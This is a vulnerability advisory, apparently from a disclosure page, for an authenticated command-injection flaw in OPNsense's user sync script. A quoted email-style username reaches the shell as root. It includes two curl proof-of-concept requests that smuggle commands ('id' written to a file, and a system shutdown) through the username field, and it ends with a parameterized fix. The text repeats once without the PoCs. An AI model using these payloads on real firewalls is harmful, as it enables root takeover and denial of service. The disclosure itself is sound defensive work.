Summary
An authenticated Remote Code Execution (RCE) vulnerability in the OPNsense core allows a user with user-management privileges to execute arbitrary system commands as root. An attacker can bypass input validation by formatting their malicious payload as a compliant email address, allowing shell commands to reach the underlying operating system.
Details
The flaw exists in the local user synchronization flow, within core/src/opnsense/scripts/auth/sync_user.php.
When a user is added or modified, the script signals the backend that a user change has occurred by invoking pluginctl. However, the $username variable is passed directly into the shell command string.
While both the web interface and API enforce validation on the username field, the application explicitly allows valid email addresses to be used as usernames. The "local-part" of an email address can be wrapped in quotes. Inside these quotes, shell metacharacters are considered legally valid email characters.
By supplying a crafted email address, the payload passes the email validation checks but retains the shell payload. When passed blindly to the shell by mwexecf, the shell interprets the metacharacters, leading to arbitrary command execution.
PoC - Examples
curl -k -u <api key> \
-H 'Content-Type: application/json' \
-X POST http://<IP>/api/auth/user/add/ \
-d '{"user": {"name": "\"`id>/conf/proof.txt`\"@example.com", "password": "TestPass123", "scrambled_password": "0"}}'
Result: uid=0(root) gid=0(wheel) groups=0(wheel)
curl -k -u <api key> \
-H 'Content-Type: application/json' \
-X POST http://<IP>/api/auth/user/add/ \
-d '{"user": {"name": "\"`/sbin/shutdown${IFS}-p${IFS}now`\"@example.com", "password": "TestPass123", "scrambled_password": "0"}}Impact
Successful exploitation yields total system compromise. Because the injected commands execute as root, an attacker can completely take over the firewall.
Recommended Fix
In sync_user.php:
- mwexecf('/usr/local/sbin/pluginctl -c user_changed ' . $username);
+ mwexecf('/usr/local/sbin/pluginctl -c user_changed %s', [$username]);
sopex Reporter
Summary
An authenticated Remote Code Execution (RCE) vulnerability in the OPNsense core allows a user with user-management privileges to execute arbitrary system commands as root. An attacker can bypass input validation by formatting their malicious payload as a compliant email address, allowing shell commands to reach the underlying operating system.
Details
The flaw exists in the local user synchronization flow, within core/src/opnsense/scripts/auth/sync_user.php.
When a user is added or modified, the script signals the backend that a user change has occurred by invoking pluginctl. However, the $username variable is passed directly into the shell command string.
While both the web interface and API enforce validation on the username field, the application explicitly allows valid email addresses to be used as usernames. The "local-part" of an email address can be wrapped in quotes. Inside these quotes, shell metacharacters are considered legally valid email characters.
By supplying a crafted email address, the payload passes the email validation checks but retains the shell payload. When passed blindly to the shell by mwexecf, the shell interprets the metacharacters, leading to arbitrary command execution.
PoC - Examples
Impact
Successful exploitation yields total system compromise. Because the injected commands execute as root, an attacker can completely take over the firewall.
Recommended Fix
In sync_user.php:
- mwexecf('/usr/local/sbin/pluginctl -c user_changed ' . $username);+ mwexecf('/usr/local/sbin/pluginctl -c user_changed %s', [$username]);